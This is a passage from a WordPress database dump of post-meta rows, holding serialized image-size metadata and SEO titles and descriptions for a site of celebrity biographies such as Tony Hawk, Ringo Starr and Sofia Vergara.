"Sabrina-Carpenter-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:30:\"Sabrina-Carpenter-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:29:\"Sabrina-Carpenter-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(643,129,'_wp_attachment_image_alt','Sabrina Carpenter'),(644,118,'_thumbnail_id','129'),(646,130,'_wp_attached_file','2015/05/Tony-Hawk.jpg'),(647,130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:21:\"2015/05/Tony-Hawk.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Tony-Hawk-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"Tony-Hawk-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"Tony-Hawk-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"Tony-Hawk-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:21:\"Tony-Hawk-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(648,130,'_wp_attachment_image_alt','Tony Hawk'),(649,120,'_thumbnail_id','130'),(651,131,'_wp_attached_file','2015/05/Robert-Pattinson.jpg'),(652,131,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:28:\"2015/05/Robert-Pattinson.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Robert-Pattinson-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"Robert-Pattinson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"Robert-Pattinson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-696x522.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"Robert-Pattinson-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"Robert-Pattinson-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(653,131,'_wp_attachment_image_alt','Robert Pattinson'),(654,121,'_thumbnail_id','131'),(656,134,'_edit_lock','1444846846:6'),(657,134,'_edit_last','6'),(658,134,'_oembed_7fb6eb0cbd2405845ce4b24e98304b88','{{unknown}}'),(659,134,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(660,134,'slide_template',''),(661,134,'_yoast_wpseo_focuskw','Pamela Anderson'),(662,134,'_yoast_wpseo_title','Pamela Anderson'),(663,134,'_yoast_wpseo_metadesc','Biography and interesting facts from Pamela Anderson\'s life!'),(664,134,'_yoast_wpseo_linkdex','83'),(665,134,'post_views_count','379'),(666,135,'_edit_lock','1444846879:6'),(667,135,'_edit_last','6'),(668,136,'_wp_attached_file','2015/07/Linsay-Lohan.jpg'),(669,136,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:24:\"2015/07/Linsay-Lohan.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Linsay-Lohan-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Linsay-Lohan-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Linsay-Lohan-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(670,136,'_wp_attachment_image_alt','Linsay Lohan'),(671,135,'_thumbnail_id','136'),(672,135,'post_views_count','273'),(673,135,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(674,135,'slide_template',''),(675,135,'_yoast_wpseo_focuskw','Lindsay Lohan'),(676,135,'_yoast_wpseo_title','Lindsay Lohan'),(677,135,'_yoast_wpseo_metadesc','Learn all about the most famous redhead girl, Lindsay Lohan!'),(678,135,'_yoast_wpseo_linkdex','80'),(679,138,'_edit_lock','1444846905:6'),(680,138,'_edit_last','6'),(681,138,'_oembed_22d0e308eabfcfe811bc2ac93a010976','{{unknown}}'),(682,138,'_oembed_522b6406240bfa789309216e9d52f5f6','<a href=\"https://www.flickr.com/photos/gageskidmore/9357416526/sizes/z/\"><img src=\"https://farm6.staticflickr.com/5510/9357416526_558cc0a2e8_z.jpg\" alt=\"Tom Cruise\" width=\"640\" height=\"427\" /></a>'),(683,138,'_oembed_time_522b6406240bfa789309216e9d52f5f6','1437102174'),(684,138,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(685,138,'slide_template',''),(686,138,'_yoast_wpseo_focuskw','Tom Cruise'),(687,138,'_yoast_wpseo_title','Tom Cruise'),(688,138,'_yoast_wpseo_metadesc','All about this hot tremendous actor, Tom cruise!'),(689,138,'_yoast_wpseo_linkdex','83'),(690,138,'post_views_count','188'),(691,139,'_edit_lock','1444846931:6'),(692,139,'_edit_last','6'),(697,139,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(698,139,'slide_template',''),(699,139,'_yoast_wpseo_focuskw',' 50 Cent'),(700,139,'_yoast_wpseo_title',' 50 Cent'),(701,139,'_yoast_wpseo_metadesc','New yorkers know how to rap. If no read 50 Cent bio!'),(702,139,'_yoast_wpseo_linkdex','68'),(703,139,'post_views_count','253'),(704,141,'_edit_lock','1444847014:6'),(705,141,'_edit_last','6'),(706,142,'_wp_attached_file','2015/07/Ringo-Starr.jpg'),(707,142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:23:\"2015/07/Ringo-Starr.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:21:\"Ringo-Starr-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:22:\"Ringo-Starr-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-534x426.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:23:\"Ringo-Starr-631x420.jpg\";s:5:\"width\";i:631;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:12:\"Rob Shanahan\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:153:\"Ringo Starr celebrates his 71st birthday at the Hard Rock in Hamburg, Germany. July 7, 2011, with a moment of peace and love. Photograph © Rob Shanahan.\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:12:\"Rob Shanahan\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:5:{i:0;s:11:\"Ringo Starr\";i:1;s:12:\"Rob Shanahan\";i:2;s:9:\"Hard Rock\";i:3;s:7:\"Hamburg\";i:4;s:7:\"Germany\";}}}'),(708,142,'_wp_attachment_image_alt','Ringo Starr'),(709,141,'_thumbnail_id','142'),(710,141,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(711,141,'slide_template',''),(712,141,'_yoast_wpseo_focuskw','Ringo Starr'),(713,141,'_yoast_wpseo_title','Ringo Starr'),(714,141,'_yoast_wpseo_metadesc','The beat in \'The Beatles\': Ringo Starr!'),(715,141,'_yoast_wpseo_linkdex','83'),(716,141,'post_views_count','309'),(717,143,'_edit_lock','1444847052:6'),(718,143,'_edit_last','6'),(719,143,'_oembed_48ebe0887750c49249335fe312eaa3aa','{{unknown}}'),(720,143,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(721,143,'slide_template',''),(722,143,'_yoast_wpseo_focuskw','Toby Keith'),(723,143,'_yoast_wpseo_title','Toby Keith'),(724,143,'_yoast_wpseo_metadesc','Toby Keith biography.'),(725,143,'_yoast_wpseo_linkdex','88'),(726,143,'post_views_count','272'),(727,144,'_edit_lock','1444847082:6'),(728,144,'_edit_last','6'),(733,144,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(734,144,'slide_template',''),(735,144,'_yoast_wpseo_focuskw','Tom Hanks'),(736,144,'_yoast_wpseo_title','Tom Hanks'),(737,144,'_yoast_wpseo_metadesc','All you wanted to know about Tom Hanks!'),(738,144,'_yoast_wpseo_linkdex','83'),(739,144,'post_views_count','264'),(740,146,'_edit_lock','1444847108:6'),(741,146,'_edit_last','6'),(742,146,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(743,146,'slide_template',''),(744,146,'_yoast_wpseo_focuskw','Sofia Vergara'),(745,146,'_yoast_wpseo_title','Sofia Vergara'),(746,146,'_yoast_wpseo_metadesc','Sofia Vergara the colombian girl who caught out the US!'),(747,146,'_yoast_wpseo_linkdex','77'),(748,147,'_wp_attached_file','2015/07/Sofia-Vergara.jpg'),(749,147,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:25:\"2015/07/Sofia-Vergara.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Sofia-Vergara-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Sofia-Vergara-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Sofia-Vergara-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(750,147,'_wp_attachment_image_alt','Sofia Vergara'),(751,146,'_thumbnail_id','147'),(752,146,'post_views_count','253'),(753,148,'_edit_lock','1444847031:6'),(754,148,'_edit_last','6'),(755,149,'_wp_attached_file','2015/07/Giorgio-Armani.jpg'),(756,149,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:26:\"2015/07/Giorgio-Armani.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Giorgio-Armani-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Giorgio-Armani-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-265x198.jp